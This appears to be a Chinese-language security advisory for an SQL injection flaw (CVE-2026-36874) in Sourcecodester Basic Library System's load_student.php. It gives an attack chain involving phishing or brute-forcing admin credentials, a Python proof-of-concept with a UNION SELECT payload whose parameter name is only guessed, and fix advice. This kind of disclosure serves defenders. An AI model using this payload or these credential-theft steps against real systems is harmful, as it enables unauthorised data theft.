IPBUF安全漏洞报告
English
CVE-2026-36874 CVSS 2.7 低危

CVE-2026-36874 Basic Library System SQL注入漏洞

披露日期: 2026-04-13
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-36874
漏洞类型
SQL注入
CVSS评分
2.7 低危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
Sourcecodester Basic Library System

相关标签

SQL注入Basic Library SystemWeb安全CVE-2026-36874低危

漏洞概述

Sourcecodester Basic Library System v1.0 版本在 `/librarysystem/load_student.php` 接口处存在 SQL 注入漏洞。由于系统未对传入的参数进行有效的安全过滤,攻击者可利用该缺陷执行恶意 SQL 语句。尽管该漏洞利用需要高权限,但仍可能导致数据库中的敏感信息泄露,影响系统机密性。

技术细节

该漏洞的具体成因在于 `load_student.php` 脚本直接将用户可控的 HTTP GET 或 POST 参数拼接到 SQL 查询字符串中执行,缺乏必要的输入验证和参数化查询保护。攻击者首先需要获得系统的高权限账户(如管理员权限),随后向受影响端点发送包含特定 SQL 语法(如单引号闭合、注释符、UNION 查询)的恶意数据。由于 CVSS 向量显示权限要求较高(PR:H),这限制了攻击范围,但一旦满足条件,攻击者即可利用 SQL 注入技术绕过认证逻辑或直接提取数据库中的敏感数据,如学生个人信息、管理员密码哈希等,造成严重的信息泄露风险。

攻击链分析

STEP 1
侦察
识别目标运行的是 Sourcecodester Basic Library System v1.0,并确定 load_student.php 接口的存在。
STEP 2
获取权限
由于 CVSS 权限要求为高 (PR:H),攻击者需要先通过钓鱼或弱口令爆破获取管理员账户凭证。
STEP 3
漏洞利用
使用高权限会话,向 load_student.php 发送构造的 HTTP 请求,在参数中注入恶意 SQL 代码(如 UNION SELECT)。
STEP 4
数据窃取
解析服务器返回的 HTML 或 JSON 响应,提取数据库版本、表结构或敏感的用户信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "http://target-ip/librarysystem/load_student.php" # Payload to test SQL Injection (extracting database version) # Assuming the parameter is 'id' or similar based on typical behavior payload = { "id": "1' UNION SELECT 1, version(), 3, 4-- -" } try: response = requests.get(url, params=payload) if response.status_code == 200: # Check if database version is reflected in response if "mysql" in response.text.lower() or response.text.strip(): print("[+] Potential SQL Injection vulnerability detected!") print("[+] Response:", response.text[:200]) else: print("[-] Injection did not return expected data, try boolean based blind.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

影响范围

Sourcecodester Basic Library System 1.0

防御指南

临时缓解措施
建议管理员立即检查 `load_student.php` 文件的源代码,移除直接的字符串拼接查询方式,改用 PDO 或 MySQLi 的预处理语句。在修复完成前,应严格限制管理员账户的使用,并部署 Web 应用防火墙(WAF)以拦截针对该路径的常见 SQL 注入攻击特征。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表